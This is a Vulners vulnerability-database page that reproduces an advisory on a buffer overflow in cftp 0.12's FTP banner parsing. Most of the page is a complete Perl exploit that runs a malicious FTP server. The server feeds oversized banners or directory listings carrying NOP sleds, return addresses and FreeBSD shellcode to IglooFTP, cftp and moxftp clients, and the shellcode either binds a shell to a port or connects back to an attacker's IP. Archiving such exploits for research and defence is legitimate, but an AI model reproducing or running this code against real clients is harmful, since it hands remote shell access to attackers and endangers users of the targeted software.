Vulners
Lucene search
cftp 0.12 Banner Parsing Buffer Overflow Vulnerability
source: http://www.securityfocus.com/bid/8160/info
A buffer overflow vulnerability has been reported in cftp. The vulnerability occurs when cftp is parsing 'Welcome' banner messages from remote FTP servers. When cftp receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.
#!/usr/bin/perl
# PoC exploit for iglooftp, cftp and moxftp for freebsd
# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1
# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..
# all the clients are from ports.. some may have been fixed, did this shit some
# time ago..
# thanks to kokanin for help and advice
# code by inv[at]dtors
use IO::Socket;
sub convert_ret {
my($ret) = @_;
for ($x=8; $x>0; $x=$x-2){
$ret = substr($ret_temp,$x,2);
$new_ret .= chr hex "$ret";
}
return $new_ret;
}
sub convert_ip {
my($ip) = @_;
@ip_tmp = split(/\./, $ip);
for($x=0; $x<4; $x++) {
$new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}
$server_port = 21;
$passive_server_port = 10324;
unless(@ARGV == 3 || @ARGV == 2)
{ die
"Usage ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}
($shellcode_arg, $client_arg, $extra_arg) = @ARGV;
$user_ip = convert_ip($extra_arg);
@shellcode_list = (
"Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
"Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");
@client_list = (
"IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
"cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
"mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
"cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
"IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
"mftp - FreeBSD 5.0,532,0xbfbff950,1,100");
@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);
print "\tDSR-ftp_clients by inv\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";
$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);
$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;
$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;
if(@client_info[3] eq "1") {
$nops_x = "\x90"x@client_info[1];
$nops_y = "\x90"x@client_info[4];
$exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}
if($client_arg == 0 or $client_arg == 4) {
$exploit_string ="total 666
drwxr-xr-x 25 root wheel 1536 Jan 28 00:13 .
drwxr-xr-x 14 root wheel 512 Jan 28 00:13 ..
-rwxr-xr-x 2 inv inv 512 Jan 29 01:00 $nops$shellcode$ret";
}
$server = IO::Socket::INET->new(LocalPort => $server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't listen on $server_port : $!\n";
while ($client = $server->accept()) {
if(@client_info[3] == 1) {
print $client "220 $exploit_string\n";
}
if(@client_info[3] eq "0") {
print $client "220 0xdeadcode\n";
while($request !=~ /QUIT/i) {
$request = <$client>;
print $request;
if($request =~ /PASS/i) {
print $client "230 User anonymous logged in.\n";
}
if($request =~ /USER/i) {
print $client "331 Password required for anonymous.\n";
}
if($request =~ /SYST/i) {
print $client "215 UNIX Type: L8\n";
}
if($request =~ /REST/i) {
print $client "350 Restarting.\n";
}
if($request =~ /TYPE/i) {
print $client "200 Type set to A.\n";
}
if($request =~ /PWD/i or $request =~ /FEAT/i) {
print $client "257 \"/usr/home/inv/\" is current directory.\n";
}
if($request =~ /PASV/i) {
$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't open passive port";
print $client "227 Entering Passive Mode (127,0,0,1,40,84)\n";
}
if ($request =~ /LIST/i) {
while($passive_client = $passive_server->accept()){
print $client "150 Starting transfer.\n";
print $passive_client $exploit_string;
close $passive_client;
print $client "226 BANG YOU ARE DEAD!!!\n";
}
}
}
close $client;
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1